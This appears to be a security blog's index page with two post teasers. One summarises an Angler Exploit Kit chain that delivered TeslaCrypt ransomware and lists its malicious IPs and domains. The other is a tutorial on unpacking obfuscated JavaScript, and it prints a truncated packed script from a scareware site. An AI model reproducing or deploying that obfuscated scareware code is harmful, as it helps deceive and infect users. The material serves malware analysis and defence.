Angler Exploit Kit to TeslaCrypt

There's an excellent write up by Brad Duncan in the Internet Storm Center's Handler Diaries on analyzing a compromise that used the Angler Exploit Kit to deliver TeslaCrypt.From the article:On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events.The chain started with a compromised website that generated an admedia gate.The gate led to Angler EK. Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.·         178.62.122.211 - img.belayamorda.info - admedia gate·         185.46.11.113 - ssd.summerspellman.com - Angler EK·         192.185.39.64 -...
Read more

Unpacking Packed Javascript with Rhino In Three Steps

Malware authors use various techniques for obfuscating their code. One I commonly see is using the packer compressor. Code will begin with "eval(function(p,a,c,k,e,d)". Below is a block I came across yesterday from a scareware scam site:eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d=k||e(c)}k=}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('b 1F=h.q;b 2=h.22;b d=h.V;b 9=\'\'+13(h.q);b w=O(h.q,10);b T,3,s;a((3=2.f("1R/"))!=-1){d="K";9=2.c(3+4)}i a((3=2.f("K"))!=-1){d="K";9=2.c(3+6);a((3=2.f("W"))!=-1)9=2.c(3+8)}i a((3=2.f("24"))!=-1){d="1P";9=2.c(3+5)}i a((3=2.f("X"))!=-1){d="X";9=2.c(3+7)}i a((3=2.f("1t"))!=-1){d="1t";9=2.c(3+7);a((3=2.f("W"))!=-1)9=2.c(3+8)}i a((3=2.f("11"))!=-1){d="11";9=2.c(3+8)}i a((T=2.12(\' \')+1)<(3=2.12(\'/\'))){d=2.c(T,3);9=2.c(3+1);a(d.1G()==d.1E()){d=h.V}}a((s=9.f(";"))!=-1)9=9.c(0,s);a((s=9.f(" "))!=-1)9=9.c(0,s);w=O(\'\'+9,10);a(1J(w)){9=\'\'+13(h.q);w=O(h.q,10)}1r(g(){B()},1K);b m=1D v();b 16=(m.1A()+1)+"/"+m.1B()+"/"+m.1C()+" @ "+m.1H()+":"+m.1Y();b p=r(\'p\'),U=r(\'U\'),C=r(\'C\'),l=r(\'l\');g 15(){18("1L: "+p+" Q ("+U+") x "+C+"\\n\\20 21 26 29 2a 28 S "+16+".\\n\\P ("+l+") (R 1) 2b F 25!")}g 1Z(){15();b 14=D*4,A=1s.1O(\'#1M\');Z(14,A)}g B(){18(\'\\n\\1n!!\\n\\n***************************************\\n\\1o \'+p+\' Q: 1k z 1j, 1f 1g 1h z 1q, u 1i u 1p 1z 1y 1w 1x 1v...
Read more